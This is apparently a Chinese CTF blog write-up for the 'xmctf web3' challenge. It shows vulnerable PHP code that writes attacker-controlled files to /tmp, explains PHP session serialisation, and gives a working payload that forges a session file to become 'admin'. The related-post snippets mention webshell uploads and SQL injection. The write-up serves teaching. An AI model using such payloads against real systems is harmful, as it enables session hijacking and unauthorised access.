xmctf-web-web3-wp

最新推荐文章于 2021-08-12 21:26:21 发布
最新推荐文章于 2021-08-12 21:26:21 发布
阅读量110 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118216961
版权

web3

源代码

<?php
highlight_file(__FILE__);
$content = @$_GET['content'] ? "---mylocalnote---\n" . $_GET['content'] : "";
$name = @$_GET['name'] ? $_GET['name'] : '';
str_replace('/', '', $name);
str_replace('\\', '', $name);
file_put_contents("/tmp/" . $name, $content);
session_start();
if (isset($_SESSION['username'])) {
    echo "Thank u,{$_SESSION['username']}";
}
//flag in flag.php
PHP存储session的方式描述
php_serialize经过serialize()函数序列化数组
php键名+竖线+经过serialize()函数处理的值
php_binary键名的长度对应的ascii字符+键名+serialize()函数序列化的值
函数描述
str_replace()子字符串替换
file_put_contents()file_put_contents — 将一个字符串写入文件
session_start()启动新会话或者重用现有会话

题目要求$_SESSION[‘username’]=‘admin’

向/tmp中写入文件

username|s:6:'admin';

payload

content=|N;username|s:5:"admin";&name=sess_{your PHPSESSID}

然后访问/flag.php

居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP file_get_contents函数详解
秋风扫落叶
09-01 1万+
一. file_get_contents(path,include_path,context,start,max_length) 参数 描述 path 必需。规定要读取的文件。 include_path 可选。如果也想在 include_path ...
一个简单的时间片轮转多道程序内核代码
热门推荐
qq_28325599的博客
03-06 55万+
mykernel实验指导    1.使用实验楼的虚拟机打开shell(https://www.shiyanlou.com/courses/195)      1.  shiyanlou:~/ $ cd LinuxKernel/linux-3.9.4                            [20:12:24]      2.shiyanlou:linux-3.9.4/ $
XMCTF内部赛 part1
羽的博客
07-07 2104
web3-考核 <?php highlight_file(__FILE__); $content = @$_GET['content'] ? "---mylocalnote---\n" . $_GET['content'] : ""; $name = @$_GET['name'] ? $_GET['name'] : ''; str_replace('/', '', $name); str_replace('\\', '', $name); file_put_contents("/tmp/" . $na
buuoj、xmctf、攻防世界刷题(web)write up
Love&Share
06-14 1万+
BUUOJ-每天两道,告别烦恼 WEB: [GXYCTF2019]BabySQli 输入用户名admin,发现可以登入,其他显示wrong user 源码中发现,存在base编码 先base32再base64解码,发现sql语句尝试去注入 首先尝试万能密码: 发现被拦截 尝试手工注入: 一个联合注入新知识 在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。 下面是一个自己的本地环境 数据库原本这几个用户名和密码 执行select * from flag WHERE username
xmctf web3-考核
Sk1y的博客
08-12 144
php session工作原理,session反序列化。
sh - 指令
weixin_34409357的博客
12-11 5667
sh 启动springboot的jar程序 #!/bin/sh RESOURCE_NAME=beautify-0.0.2-SNAPSHOT.jar tpid=`ps -ef|grep $RESOURCE_NAME|grep -v grep|grep -v kill|awk '{print $2}'` if [ ${tpid} ]; then echo 'Stop Process...'...
ctf-web3
gofreshman的博客
12-01 265
sql注入型题目
ctfshow web3
weixin_51866363的博客
11-20 4366
** ## **ctfshow web3** 这一道题就不像web2那么简单了,不过在借助web安全神器burpsuite的情况下还是比较容易的。 接下来就来说明一下这道题的解法以及浅显地介绍一下burp工具的使用吧!!! 看到这道题目提示我们可以知道这是一道php伪协议+文件包含漏洞的题目,先进行测试看看能不能通过 file:////etc/pas...
xmctf web4-考核
羽的博客
07-07 1369
web4-考核 根据提示key:e086aa137fa19f67d27b39d0eca18610猜测为md5值,解密得到1.1.1.1 在请求头中添加 X-Forwarded-For:1.1.1.1得到一个地址dhudndrgrhs.php内容如下 <?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_exec","ini_set", "scandir",
xmctf web12-考核(无参数RCE)
羽的博客
07-07 1360
web12-考核 无参数RCE <?php header("Content-Type: text/html;charset=utf-8"); include "flag.php"; echo "flag在哪里呢?<br>"; highlight_file(__FILE__); error_reporting(0); if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//
【XCTF高手进阶区】web3_php_rce writeup
Mitchell_Donovan的博客
01-21 393
web3_php_rce 原题链接 key:ThinkPHP5远程代码执行漏洞 ①环境打开后页面长这样式的???? ②题目是php_rce,不妨先来了解一下什么是rce???? 知识补充: 1. 什么是rce(远程代码执行漏洞) 远程命令/代码执行漏洞,简称rce漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE分为远程命令执行ping和远程代码执行evel。 2. 漏洞产生的根本原因 服务器没有针对执行函数做过滤,导致在没有指定绝对路径的情
CTF中的PHP反序列化ALL IN ONE
Love&Share
09-01 1万+
CTF中的PHP反序列化 1.反序列化的基础知识 什么是序列化,反序列化,php反序列化,序列化字符串知识,漏洞产生原因,修复方法 php反序列化漏洞,又叫php对象注入漏洞,是ctf中常见的漏洞。 PHP基础知识 PHP类与对象(https://www.php.net/manual/zh/language.oop5.php) PHP魔术方法(https://secure.php.net/manual/zh/language.oop5.magic.php) 序列化定义 php程序为了保存和转储对象,提供了序
buuctf-web-[ACTF2020 新生赛]Upload 1-wp
居上
11-11 3561
[ACTF2020 新生赛]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件中。 <script language='php'>@eval($_POST[
buuctf-web-[强网杯 2019]随便注-wp
居上
06-22 1351
[强网杯 2019]随便注 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
buuctf-web-[SUCTF 2019]EasySQL 1-wp
居上
06-22 992
[SUCTF 2019]EasySQL 源码 网上找的源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLink = mysqli_connect("localhost",$datauser,$datapass); if(!$MysqlL
buuctf-misc-qr-wp
居上
06-21 722
qr 知识点 工具QR Research的使用 过程 使用QR Research得到flag
buuctf-misc-镜子里面的世界-wp
居上
06-21 667
镜子里面的世界 知识点 stegsolve分析图片通道 stegsolve=>Date Extract提取对应通道内容 过程 red plane 0、green plane 0、blue plane 0通道被黑色遮挡,data extract 发现flag
buuctf-misc-N种方法解决-wp
居上
06-20 604
N种方法解决 知识点 使用普通编辑器打开文件,查看隐藏内容 利用html的img标签还原解码后的内容 过程 下载附件是一个KEY.exe文件,无法打开,尝试使用notepad++打开,发现一大串字符 从这个位置开始,复制到网站上解码https://the-x.cn/base64/ 发现是一个png的图片 然后我们发现他是个png的文件,得想办法还原成png文件 写个html的文件,里面加入img标签,将img标签中的src属性改为刚刚得到的整个字符内容 <!DOCTYPE html>
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值